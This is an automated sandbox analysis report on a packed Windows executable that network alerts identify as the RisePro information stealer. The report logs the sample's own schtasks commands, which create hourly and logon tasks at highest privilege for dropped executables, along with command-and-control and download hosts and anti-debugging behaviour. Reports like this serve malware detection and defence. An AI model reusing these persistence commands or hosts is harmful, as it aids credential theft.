Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 18, 2024, 10:41 a.m.	Feb. 18, 2024, 10:45 a.m.

Size	900.2KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`ff6be3e826728411d90a58ffe4834ca3`
SHA256	`51b53b4eb03653b96dd366128eabac45d17a56f6585a599496ae7fd47d77c4db`
CRC32	`939220FB`
ssdeep	`24576:fX90TYNdSRfL9ad1zQbmjZ5iNA354Nwf:fWTYSpCQMZ5SM4Nw`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature Obsidium_Zero - Obsidium protector file

reals.exe "C:\Users\test22\AppData\Local\Temp\reals.exe"
2540
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2672
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2756
- AbrybdujiWjM8arT4hMa.exe "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\AbrybdujiWjM8arT4hMa.exe"
  2960
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    3012
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409
      604
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    3032
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
      1080
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2988 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3156
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
    2568
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
      1096
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2476 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3260
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    2904
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
      800
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2908 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3144
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    936
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      1864
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
    3028
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      3036
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\cb1bf273-8c93-4bdc-acfc-2575ab516bca.dmp"
        3456
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\cb1bf273-8c93-4bdc-acfc-2575ab516bca.dmp"
        3724
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
    2376
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      3112
      - crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\62878120-c59d-47ae-a254-edf5985ff860.dmp"
        3940
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\62878120-c59d-47ae-a254-edf5985ff860.dmp"
        4056
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
  2560
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
  2628
- MZe06TxJhUpRoH7WmLDv.exe "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\MZe06TxJhUpRoH7WmLDv.exe"
  2772
- ytII1Y7nWq0uCHYObTuZ.exe "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\ytII1Y7nWq0uCHYObTuZ.exe"
  2876
- K1vNv5KZLmjUpdhligMd.exe "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\K1vNv5KZLmjUpdhligMd.exe"
  2448
- SeRO2Fsg6JF7Eqo2XFxn.exe "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\SeRO2Fsg6JF7Eqo2XFxn.exe"
  2496
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
ssl.gstatic.com	A 142.250.199.67	172.217.161.195
accounts.google.com	A 64.233.188.84	64.233.188.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 172.217.25.4	142.250.207.100
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.4.15

IP Address	Status	Action
117.18.232.200	Active	Moloch
142.250.199.67	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.4	Active	Moloch
172.67.75.166	Active	Moloch
185.215.113.46	Active	Moloch
193.233.132.62	Active	Moloch
34.117.186.192	Active	Moloch
64.233.188.84	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49167 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49167 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49169 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2400021	ET DROP Spamhaus DROP Listed Traffic Inbound group 22	Misc Attack
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49182 -> 64.233.188.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 64.233.188.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49186 -> 142.250.199.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.101:49166	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49187 -> 142.250.199.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49189 -> 172.217.25.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49190 -> 172.217.25.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49203	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49207 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49210	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49229 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49229 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49229 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49231 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49177	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49167 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49229 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49169 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49182 64.233.188.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	22:f1:10:1f:49:c5:97:f4:85:76:5a:20:dd:85:7c:ff:e2:c9:2a:1f
TLSv1 192.168.56.101:49183 64.233.188.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	22:f1:10:1f:49:c5:97:f4:85:76:5a:20:dd:85:7c:ff:e2:c9:2a:1f
TLSv1 192.168.56.101:49186 142.250.199.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	f1:41:dd:4f:a6:9f:7b:ae:ae:af:78:bd:08:f8:c8:40:3c:c4:8c:93
TLSv1 192.168.56.101:49187 142.250.199.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	f1:41:dd:4f:a6:9f:7b:ae:ae:af:78:bd:08:f8:c8:40:3c:c4:8c:93
TLSv1 192.168.56.101:49189 172.217.25.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	2a:14:a8:9a:ea:5b:44:20:c3:ae:90:ff:4d:2f:4c:22:15:54:f9:7c
TLSv1 192.168.56.101:49190 172.217.25.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	2a:14:a8:9a:ea:5b:44:20:c3:ae:90:ff:4d:2f:4c:22:15:54:f9:7c
TLSv1 192.168.56.101:49207 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49231 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameA Feb. 18, 2024, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 18, 2024, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 18, 2024, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 18, 2024, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 18, 2024, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 18, 2024, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 18, 2024, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 18, 2024, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 18, 2024, 10:42 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 225 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:41 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:42 a.m.			0	0
IsDebuggerPresent Feb. 18, 2024, 10:42 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 18, 2024, 10:41 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 18, 2024, 10:41 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 18, 2024, 10:42 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 18, 2024, 10:42 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV131 LG" has successfully been created. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (5 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 18, 2024, 10:41 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

One or more processes crashed (50 out of 563 events)

Time & API	Arguments	Status
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 10 eb 03 63 98 82 64 8f 00 eb 04 d1 74 3c 7c exception.symbol: reals+0x15c05b exception.instruction: mov edx, dword ptr [eax] exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1425499 exception.address: 0x55c05b registers.esp: 1638272 registers.edi: 0 registers.eax: 0 registers.ebp: 1638292 registers.edx: 5619712 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 00 eb 02 da 7b 64 8f 00 eb 01 ba 83 c4 04 eb exception.symbol: reals+0x15d2ca exception.instruction: mov eax, dword ptr [eax] exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1430218 exception.address: 0x55d2ca registers.esp: 1638240 registers.edi: 0 registers.eax: 0 registers.ebp: 1638292 registers.edx: 4294901775 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: exception.instruction_r: cd 01 40 40 eb 05 d0 8d 6a 3e 34 85 c0 eb 02 00 exception.symbol: reals+0x172f29 exception.instruction: int 1 exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1519401 exception.address: 0x572f29 registers.esp: 1638232 registers.edi: 5713561 registers.eax: 0 registers.ebp: 4286310840 registers.edx: 0 registers.ebx: 5621252 registers.esi: 5621252 registers.ecx: 5713790	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: exception.instruction_r: 89 0a eb 02 c8 5c e9 93 fe ff ff eb 03 0d d7 e6 exception.symbol: reals+0x15e92a exception.instruction: mov dword ptr [edx], ecx exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1435946 exception.address: 0x55e92a registers.esp: 1638240 registers.edi: 5705045 registers.eax: 0 registers.ebp: 4286316112 registers.edx: 0 registers.ebx: 10747904 registers.esi: 5621252 registers.ecx: 51841	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: exception.instruction_r: f7 f2 eb 02 05 c1 e9 97 02 00 00 eb 02 15 95 0f exception.symbol: reals+0x15e7f9 exception.instruction: div edx exception.module: reals.exe exception.exception_code: 0xc0000094 exception.offset: 1435641 exception.address: 0x55e7f9 registers.esp: 1638240 registers.edi: 8978432 registers.eax: 4057694505 registers.ebp: 4286316112 registers.edx: 0 registers.ebx: 10747904 registers.esi: 8978900 registers.ecx: 0	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x891328 reals+0x15e67c @ 0x55e67c exception.instruction_r: 0f 3f 07 0b c7 45 fc ff ff ff ff 33 c0 33 d2 39 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x89149e registers.esp: 1637880 registers.edi: 10751392 registers.eax: 1 registers.ebp: 1637892 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 2020557398	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x15e67c @ 0x55e67c exception.instruction_r: 8b 00 90 90 f8 eb 01 a3 73 42 eb 04 0d 2a e4 bb exception.instruction: mov eax, dword ptr [eax] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x891358 registers.esp: 1637904 registers.edi: 10751392 registers.eax: 0 registers.ebp: 1638220 registers.edx: 2 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 2130563072	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x15e67c @ 0x55e67c exception.instruction_r: 90 f8 eb 01 a3 73 42 eb 04 0d 2a e4 bb eb 02 8f exception.instruction: nop exception.exception_code: 0x80000004 exception.symbol: exception.address: 0x89135b registers.esp: 1637904 registers.edi: 10751392 registers.eax: 0 registers.ebp: 1638220 registers.edx: 2 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 2130563072	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x15e67c @ 0x55e67c exception.instruction_r: 0f 0b eb 04 31 be 6c e3 0f 0b eb 05 8a 86 83 04 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x891416 registers.esp: 1637904 registers.edi: 10754240 registers.eax: 0 registers.ebp: 1638220 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 235	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9 RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x736f482b KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 reals+0x15e67c @ 0x55e67c exception.instruction_r: f7 f0 eb 04 df b1 d9 97 eb 01 e3 eb 03 66 39 96 exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8915be registers.esp: 1636112 registers.edi: 0 registers.eax: 0 registers.ebp: 1636128 registers.edx: 5629193 registers.ebx: 8983875 registers.esi: 0 registers.ecx: 1636780	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x15e67c @ 0x55e67c exception.instruction_r: cd 01 40 40 eb 01 f0 85 c0 70 7c 74 5b eb 05 ea exception.instruction: int 1 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x891629 registers.esp: 1637904 registers.edi: 10755608 registers.eax: 0 registers.ebp: 1638220 registers.edx: 8984343 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 5629193	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x15e67c @ 0x55e67c exception.instruction_r: cc eb 02 ca e0 33 c9 7c d0 8b 83 28 03 00 00 eb exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x8917b5 registers.esp: 1637900 registers.edi: 10757080 registers.eax: 0 registers.ebp: 1638220 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 1637900 registers.ecx: 116	1
